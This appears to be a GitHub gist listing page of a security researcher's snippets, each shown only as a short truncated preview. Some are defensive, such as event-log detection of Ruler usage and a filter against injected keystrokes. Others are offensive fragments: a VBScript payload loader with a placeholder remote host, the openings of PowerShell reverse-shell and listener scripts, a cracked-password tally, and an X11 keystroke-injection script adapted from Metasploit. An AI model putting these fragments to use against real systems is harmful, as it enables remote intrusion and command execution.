This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
version: '2' | |
services: | |
doorman: | |
image: doorman | |
container_name: "doorman" | |
build: | |
context: ./doorman | |
dockerfile: Dockerfile_doorman | |
links: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object { | |
$sp = $_.message -split "`n" | |
$tmp = $sp | Select-String -Pattern 'RULER' | |
if($tmp.count -ge 1){ | |
Write-Host "Possible Ruler usage at: " $_.TimeGenerated | |
$sp | Select-String -Pattern 'Logon Account:' | write-host | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Call X() | |
End Function | |
Dim RHOST: RHOST = "x.x.x.x" | |
Dim RPORT: RPORT = "8999" | |
Function Base64ToStream(b) | |
Dim enc, length, ba, transform, ms | |
Set enc = CreateObject("System.Text.ASCIIEncoding") | |
length = enc.GetByteCount_2(b) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed. | |
* Ensures that only valid R400 keys are pressed and not rogue keys injected. | |
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them | |
* Author: Etienne Stalmans <[email protected]> | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"flag" | |
"fmt" | |
"log" | |
"net/http" | |
"os" | |
"golang.org/x/net/webdav" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080); | |
if($socket -eq $null){ | |
exit 1; | |
} | |
$socket.start(); | |
$client = $socket.AcceptTcpClient(); | |
$stream = $client.GetStream(); | |
$buffer = new-object System.Byte[] 2048; | |
$file = 'c:/afile.exe'; | |
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
grep -v "^\s*$" /tmp/cracked| sort | uniq -c | sort -bnr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do | |
{ | |
$writer.Flush(); | |
$read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413); | |
if($socket -eq $null){ | |
exit 1 | |
} | |
$socket.start() | |
$client = $socket.AcceptTcpClient() | |
write-output "[*] Connection!" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Python script to connect to an abstract unix socket created by X11 and send arbitrary key-strokes. | |
Created by: [email protected] | |
Credits to: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/x11/x11_keyboard_exec.rb | |
Borrowed heavily from the original metasploit module. Thanks! | |
""" | |
from socket import * | |
import subprocess |